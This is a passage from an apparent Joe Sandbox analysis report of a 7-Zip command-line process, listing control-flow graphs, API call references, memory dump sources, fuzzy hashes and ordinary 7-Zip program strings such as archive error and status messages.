3116->3105 3133 1dfa75-1dfa8f GetCurrentProcess SetProcessAffinityMask free 3122->3133 3131 1dfa3d-1dfa46 3123->3131 3132 1dfa49-1dfa4d 3123->3132 3131->3132 3132->3122 3132->3133 3133->3104
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Unsupported switch postfix -stm, xrefs: 001DFA52
                                                                                                                                                                                                                                • SeLockMemoryPrivilege, xrefs: 001DF9CB
                                                                                                                                                                                                                                • SeRestorePrivilege, xrefs: 001DF91C
                                                                                                                                                                                                                                • Unsupported switch postfix -bb, xrefs: 001DF8C3
                                                                                                                                                                                                                                • SeCreateSymbolicLinkPrivilege, xrefs: 001DF92A
                                                                                                                                                                                                                                • Unsupported switch postfix for -slp, xrefs: 001DF991
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                                                                                                                                                                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                                                                                                                                                                                                                • API String ID: 1961088698-2328792591
                                                                                                                                                                                                                                • Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                                                • Instruction ID: 1553a6db96295eeb07151e60d1bbc8d65bdf3a7e4cc7feaae971f55fd89ebf01
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABA1AF73A08AC4D9DB11DF25D4903AC3B60E7A5B94F98807BDB9D47726CF28CA86C710

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 3134 21a448-21a455 3135 21a457-21a45f 3134->3135 3136 21a49c-21a4a4 3134->3136 3135->3136 3137 21a461-21a495 call 1d2300 fputs call 1d26a0 call 1d2300 3135->3137 3138 21a4f4 3136->3138 3139 21a4a6-21a4a9 3136->3139 3137->3136 3141 21a4fc-21a50a 3138->3141 3142 21a4ab-21a4da call 1d2300 fputs call 1d26a0 call 1d2300 3139->3142 3143 21a4df-21a4e5 3139->3143 3146 21a53d-21a559 free 3141->3146 3147 21a50c 3141->3147 3142->3143 3143->3141 3151 21a55b 3146->3151 3152 21a58c-21a5b5 free 3146->3152 3150 21a510-21a526 3147->3150 3156 21a538-21a53b 3150->3156 3157 21a528-21a533 free * 2 3150->3157 3158 21a55f-21a575 3151->3158 3160 21a5c5-21a5c8 3152->3160 3161 21a5b7-21a5be 3152->3161 3156->3146 3156->3150 3157->3156 3163 21a587-21a58a 3158->3163 3164 21a577-21a582 free * 2 3158->3164 3167 21a5e7-21a603 free 3160->3167 3168 21a5ca-21a5e6 _CxxThrowException 3160->3168 3161->3160 3166 21a5c0 3161->3166 3163->3152 3163->3158 3164->3163 3170 21a5c0 call 2166a8 3166->3170 3171 21a605 3167->3171 3172 21a626-21a637 free call 1fa13c 3167->3172 3168->3167 3170->3160 3173 21a609-21a624 free 3171->3173 3175 21a63c-21a675 call 217080 call 1d182c call 217f50 3172->3175 3173->3172 3173->3173 3182 21a677 3175->3182 3183 21a6a8-21a6c9 free 3175->3183 3184 21a67b-21a691 3182->3184 3186 21a6a3-21a6a6 3184->3186 3187 21a693-21a69e free * 2 3184->3187 3186->3183 3186->3184 3187->3186
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$fputs$ExceptionThrowfputc
                                                                                                                                                                                                                                • String ID: Errors: $Warnings:
                                                                                                                                                                                                                                • API String ID: 437615013-2345102087
                                                                                                                                                                                                                                • Opcode ID: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
                                                                                                                                                                                                                                • Instruction ID: 1749c53fc767a83c65e72ac021fe62122c6ba98f2e39f52f12cabfe829107142
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C35194627295C191C930EF25E9913EEA3A2F7B5790F484123DAAD17759CF3CC8D68701

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 3188 1f83c8-1f841d call 1d6570 call 1d31c0 call 1d8624 3195 1f841f-1f844c call 1d31c0 call 1d86dc 3188->3195 3196 1f8482 3188->3196 3195->3196 3210 1f844e-1f847b call 1d31c0 call 1d86dc 3195->3210 3198 1f8485-1f8489 3196->3198 3200 1f848b-1f8498 free 3198->3200 3201 1f8499-1f849d 3198->3201 3200->3201 3203 1f849f-1f84ac free 3201->3203 3204 1f84ad-1f84b1 3201->3204 3203->3204 3205 1f84bd-1f84c0 3204->3205 3206 1f84b3-1f84b8 free 3204->3206 3208 1f85ef-1f8607 call 1d3314 free 3205->3208 3209 1f84c6-1f84ee call 1d3208 call 1f8290 3205->3209 3206->3205 3217 1f860a-1f8611 3208->3217 3222 1f851b-1f8538 call 1f8290 3209->3222 3223 1f84f0-1f8516 call 1d3314 free * 2 3209->3223 3210->3196 3224 1f847d-1f8480 3210->3224 3229 1f853a-1f8560 call 1d3314 free * 2 3222->3229 3230 1f8565-1f857b call 1f8290 3222->3230 3223->3217 3224->3198 3229->3217 3235 1f857d-1f85a3 call 1d3314 free * 2 3230->3235 3236 1f85a5-1f85bb call 1f8290 3230->3236 3235->3217 3241 1f85bd-1f85e3 call 1d3314 free * 2 3236->3241 3242 1f85e5-1f85ea free 3236->3242 3241->3217 3242->3208
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                                                                                                                                                                                                                • API String ID: 1534225298-3804457719
                                                                                                                                                                                                                                • Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                                                • Instruction ID: ddd78be3578440a62591ce33acebbbe18c5c34dc2f10b0e7a344325920609f76
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B51646220564591DE20EF15E8513A9A730E7E67E4F885223FB6E577B9CF3CC68AC700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 3245 1fab74-1faba4 3246 1faba6 3245->3246 3247 1fabd3-1fabf5 3245->3247 3248 1fabaa-1fabbc 3246->3248 3249 1fabfb 3247->3249 3250 1fae31-1fae78 call 1f83c8 call 1d31c0 call 1fa7fc free 3247->3250 3252 1fabce-1fabd1 3248->3252 3253 1fabbe-1fabc9 call 1f94a8 free 3248->3253 3254 1fac02-1facba call 1d3208 call 1d3518 call 1d3208 * 2 3249->3254 3268 1fae7f-1fae87 3250->3268 3269 1fae7a 3250->3269 3252->3247 3252->3248 3253->3252 3277 1facbc-1facc1 call 1d3518 3254->3277 3278 1facc6-1faccd 3254->3278 3272 1fae99-1faeca call 1d31c0 call 1fa9fc free 3268->3272 3273 1fae89-1fae94 call 1d339c 3268->3273 3271 1faf7a-1faf99 free 3269->3271 3288 1faecc 3272->3288 3289 1faed1-1faeee call 1d31c0 call 1fa9fc 3272->3289 3273->3272 3277->3278 3281 1faccf-1facd4 call 1d3518 3278->3281 3282 1facd9-1fad35 call 1f9d98 free * 2 3278->3282 3281->3282 3291 1fad37-1fad4c call 1fa034 3282->3291 3292 1fad51-1fad61 call 1d2130 3282->3292 3288->3271 3300 1faef3-1faf02 free 3289->3300 3299 1faddd-1fadf2 call 1d2130 3291->3299 3301 1fad6c 3292->3301 3302 1fad63-1fad6a 3292->3302 3311 1fadf4-1fae01 call 1f9af0 3299->3311 3312 1fae03 3299->3312 3304 1faf06-1faf10 3300->3304 3305 1faf04 3300->3305 3306 1fad6f-1fad8b call 1db8f0 3301->3306 3302->3306 3308 1faf18-1faf1b 3304->3308 3309 1faf12-1faf16 3304->3309 3305->3271 3317 1fadbd-1fadc0 3306->3317 3318 1fad8d-1fad93 3306->3318 3313 1faf2a-1faf2e 3308->3313 3315 1faf1d-1faf24 3308->3315 3309->3313 3319 1fae06-1fae2b call 1db8f0 call 1f94a8 3311->3319 3312->3319 3321 1faf77 3313->3321 3322 1faf30-1faf36 3313->3322 3315->3313 3320 1faf26 3315->3320 3323 1fadda 3317->3323 3324 1fadc2-1fadd3 memmove 3317->3324 3326 1fad95-1fad9a free 3318->3326 3327 1fada1-1fadac 3318->3327 3319->3250 3319->3254 3320->3313 3321->3271 3322->3321 3329 1faf38 3322->3329 3323->3299 3324->3299 3326->3327 3330 1fadae-1fadb9 call 1d2130 3327->3330 3331 1fadd5-1fadd8 3327->3331 3333 1faf3b-1faf5a GetProcAddress 3329->3333 3330->3317 3331->3299 3336 1faf5c-1faf64 3333->3336 3337 1faf66-1faf6f 3333->3337 3336->3337 3342 1faf73-1faf75 3336->3342 3337->3333 3338 1faf71 3337->3338 3338->3321 3342->3271
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FABC9
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FACF3
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FACFE
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FAD95
                                                                                                                                                                                                                                • memmove.MSVCRT(?), ref: 001FADCB
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FAE70
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FAF7F
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94DB
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94E3
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94F0
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F951C
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F9525
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F952D
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F953A
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FAEC2
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
                                                                                                                                                                                                                                  • Part of subcall function 001FA9FC: free.MSVCRT ref: 001FAA95
                                                                                                                                                                                                                                  • Part of subcall function 001FA9FC: free.MSVCRT ref: 001FAAC5
                                                                                                                                                                                                                                  • Part of subcall function 001FA9FC: free.MSVCRT ref: 001FAAD2
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FAEFA
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 001FAF4D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove$AddressProc
                                                                                                                                                                                                                                • String ID: 7z.dll$Codecs\$Formats\$SetCodecs
                                                                                                                                                                                                                                • API String ID: 4053071709-2499791885
                                                                                                                                                                                                                                • Opcode ID: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
                                                                                                                                                                                                                                • Instruction ID: 0a74a9f7efce6ecc611a7d0b199900673d635266ebc9c907ee8bde1ad2a9e5ca
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43B1D2B6214AC596CB20EB21E4903BFB760F795788F944112EB9E47B25CF7CC969C702

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 3343 211850-211886 EnterCriticalSection 3344 2118b1-2118bb 3343->3344 3345 211888-21188e call 21b1c8 3343->3345 3347 2118c2-2118c4 3344->3347 3348 2118bd call 1d22e4 3344->3348 3349 211893-2118ac 3345->3349 3351 211991-21199e 3347->3351 3352 2118ca-2118d2 3347->3352 3348->3347 3349->3344 3353 2119a4-2119a7 3351->3353 3354 211a4e-211a57 LeaveCriticalSection 3351->3354 3355 2118d4-2118da 3352->3355 3356 21191a-21192b 3352->3356 3353->3354 3357 2119ad-2119b7 3353->3357 3358 211a59-211a62 3354->3358 3355->3356 3361 2118dc-2118e2 3355->3361 3359 21196a-211974 3356->3359 3360 21192d-21193a call 1d2300 3356->3360 3362 211a31-211a4c LeaveCriticalSection 3357->3362 3363 2119b9-2119d7 call 1d2300 fputs 3357->3363 3359->3362 3365 21197a-211981 3359->3365 3360->3359 3374 21193c-211965 fputs call 1d26a0 call 1d2300 3360->3374 3366 2118e4-2118eb 3361->3366 3367 2118ed 3361->3367 3362->3358 3378 2119f2-211a14 call 1d6618 call 1d2320 free 3363->3378 3379 2119d9-2119f0 fputs 3363->3379 3365->3362 3371 211987-21198c call 1d22e4 3365->3371 3368 2118f4-2118fe 3366->3368 3367->3368 3368->3359 3372 211900-211913 fputs call 1d2300 3368->3372 3371->3362 3381 211918 3372->3381 3374->3359 3382 211a19-211a2c call 1d2300 call 1d22e4 3378->3382 3379->3382 3381->3359 3382->3362
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 00211877
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021190A
                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00211A44
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021194D
                                                                                                                                                                                                                                  • Part of subcall function 001D26A0: fputs.MSVCRT ref: 001D26C1
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 002119CB
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 002119EA
                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00211A51
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                • free.MSVCRT ref: 00211A14
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                                                                                                                                                                                                                • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                                                                                                                                                                                                                • API String ID: 676172275-580504279
                                                                                                                                                                                                                                • Opcode ID: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
                                                                                                                                                                                                                                • Instruction ID: 99deb694bd137d918c71f4d9372974fbc6e2c9a64000abb8f3a2ae840808e86d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85514A72315A82A2EB19AF25DAA43E96360FB64B90F445126DF7E07750CF38D4B4C300

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 3392 1f38e8-1f3977 call 1f1700 call 1f373c memmove 3397 1f3979-1f398d call 1f3864 free 3392->3397 3398 1f3992-1f39a5 3392->3398 3405 1f3cb6-1f3cc9 3397->3405 3400 1f39ab 3398->3400 3401 1f3a30-1f3a3d call 1f3864 3398->3401 3403 1f39ae-1f39c2 3400->3403 3411 1f3a3f-1f3a64 call 1f02a0 _CxxThrowException 3401->3411 3412 1f3a65-1f3a77 3401->3412 3406 1f3a1d-1f3a25 3403->3406 3407 1f39c4-1f39ec call 1f09e0 call 1d2130 3403->3407 3406->3403 3409 1f3a27-1f3a2b 3406->3409 3426 1f39ee-1f39f9 call 1d3314 3407->3426 3427 1f39fb 3407->3427 3409->3401 3411->3412 3415 1f3a79-1f3a7c 3412->3415 3416 1f3ae1-1f3b27 call 205f5c call 1f13e8 * 2 3412->3416 3420 1f3a7e-1f3aac call 1d3208 call 1d6e10 call 1d2130 3415->3420 3439 1f3b2d-1f3b30 3416->3439 3440 1f3c2a-1f3c46 free 3416->3440 3443 1f3aae-1f3abb call 1d3314 3420->3443 3444 1f3abd 3420->3444 3430 1f39fe-1f3a16 call 1db8f0 free 3426->3430 3427->3430 3430->3406 3442 1f3b33-1f3b56 call 1d2130 3439->3442 3445 1f3c48 3440->3445 3446 1f3c76-1f3c84 free 3440->3446 3460 1f3b68 3442->3460 3461 1f3b58-1f3b66 call 1d3314 3442->3461 3450 1f3ac0-1f3adf call 1db8f0 free 3443->3450 3444->3450 3451 1f3c4c-1f3c5f 3445->3451 3447 1f3c88-1f3c95 3446->3447 3452 1f3ca7-1f3caa 3447->3452 3453 1f3c97-1f3ca2 free * 2 3447->3453 3450->3416 3450->3420 3457 1f3c71-1f3c74 3451->3457 3458 1f3c61-1f3c6c free * 2 3451->3458 3452->3447 3459 1f3cac-1f3cb4 free 3452->3459 3453->3452 3457->3446 3457->3451 3458->3457 3459->3405 3464 1f3b6b-1f3ba1 call 1d2130 3460->3464 3461->3464 3468 1f3bb3 3464->3468 3469 1f3ba3-1f3bb1 call 1d3314 3464->3469 3471 1f3bb6-1f3bc6 3468->3471 3469->3471 3473 1f3bc8-1f3be2 call 1d4338 3471->3473 3474 1f3be4-1f3bf2 3471->3474 3473->3474 3478 1f3bfa-1f3c29 call 1f02a0 _CxxThrowException 3473->3478 3474->3442 3476 1f3bf8 3474->3476 3476->3440 3478->3440
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001F373C: free.MSVCRT ref: 001F37FB
                                                                                                                                                                                                                                • memmove.MSVCRT ref: 001F396F
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F3986
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F3A11
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001F3A5F
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F3AD3
                                                                                                                                                                                                                                  • Part of subcall function 001F3864: free.MSVCRT ref: 001F3877
                                                                                                                                                                                                                                  • Part of subcall function 001F3864: free.MSVCRT ref: 001F3892
                                                                                                                                                                                                                                  • Part of subcall function 001F3864: free.MSVCRT ref: 001F389B
                                                                                                                                                                                                                                  • Part of subcall function 001F3864: free.MSVCRT ref: 001F38C6
                                                                                                                                                                                                                                  • Part of subcall function 001F3864: free.MSVCRT ref: 001F38CE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                                                • String ID: Cannot find archive$Duplicate archive path:
                                                                                                                                                                                                                                • API String ID: 3934437811-2067063536
                                                                                                                                                                                                                                • Opcode ID: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
                                                                                                                                                                                                                                • Instruction ID: 95f29508aeb1440f2ac8d4e2cb07efb40470c6de58321bca18d42618076501a8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CA19472315B8992CA20EB16E89056EB3A1F7D5BD0F444512EFAE47B29DF3CC946CB10

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 3481 2042a2-2042c0 3483 2042c2-2042d0 3481->3483 3484 2042d5-2042d8 3481->3484 3483->3484 3485 2042e0-2043ab call 1f40c4 memmove call 1d3404 call 203a20 3484->3485 3486 2042da 3484->3486 3494 2043b1-2043b3 3485->3494 3495 2045d8-20468f call 1d3404 * 3 free * 2 call 1f419c 3485->3495 3486->3485 3497 2046c5-2046f4 free * 2 call 1f419c 3494->3497 3498 2043b9-2043d7 call 1fc684 3494->3498 3534 204691-204697 3495->3534 3535 204698-2046a0 3495->3535 3505 2046f6-2046fc 3497->3505 3506 2046fd-204705 3497->3506 3507 204728-204757 free * 2 call 1f419c 3498->3507 3508 2043dd-2043ef call 1d2130 3498->3508 3505->3506 3511 204707-20470d 3506->3511 3512 20470e-204719 3506->3512 3526 204760-204768 3507->3526 3527 204759-20475f 3507->3527 3522 2043f1-204401 call 1fcaac 3508->3522 3523 204403 3508->3523 3511->3512 3517 204721-204723 3512->3517 3518 20471b 3512->3518 3525 2047fe-204811 3517->3525 3518->3517 3532 204406-204441 call 1db8f0 free * 2 call 1f419c 3522->3532 3523->3532 3529 204771-20477c 3526->3529 3530 20476a-204770 3526->3530 3527->3526 3536 204784-204786 3529->3536 3537 20477e 3529->3537 3530->3529 3551 204443-204449 3532->3551 3552 20444a-204452 3532->3552 3534->3535 3541 2046a2-2046a8 3535->3541 3542 2046a9-2046b4 3535->3542 3536->3525 3543 2047f2-2047fb 3536->3543 3537->3536 3541->3542 3542->3543 3546 2046ba-2046c0 3542->3546 3543->3525 3546->3543 3551->3552 3553 204454-20445a 3552->3553 3554 20445b-20446c 3552->3554 3553->3554 3556 204472-204478 3554->3556 3557 203fa9-204033 memmove 3554->3557 3556->3557 3560 204054-204072 memmove 3557->3560 3561 204035-204052 memmove 3557->3561 3560->3543 3563 204078-2040e9 memmove call 1fc0fc call 1d3404 * 2 call 203d58 3560->3563 3561->3563 3573 2040ee-2040f2 3563->3573 3574 2040f8-20410a call 1d2130 3573->3574 3575 20447d-204480 3573->3575 3582 20410c-20411c call 1fcaac 3574->3582 3583 20411e 3574->3583 3576 204486-20450b call 1d3404 * 3 3575->3576 3577 20450c-20451b call 1f419c 3575->3577 3576->3577 3577->3525 3587 204121-20413a call 1db8f0 call 1f419c 3582->3587 3583->3587
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-3916222277
                                                                                                                                                                                                                                • Opcode ID: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
                                                                                                                                                                                                                                • Instruction ID: e4caf81a62f5baefe01874c72bb2ccfdabb6dcf2c438b8fb22e6de8d417598b8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78D14C77219BC596CB21EF25E0902AEBB60F7D6B44F444016DB8E43B6ADF78C599CB00
                                                                                                                                                                                                                                APIs
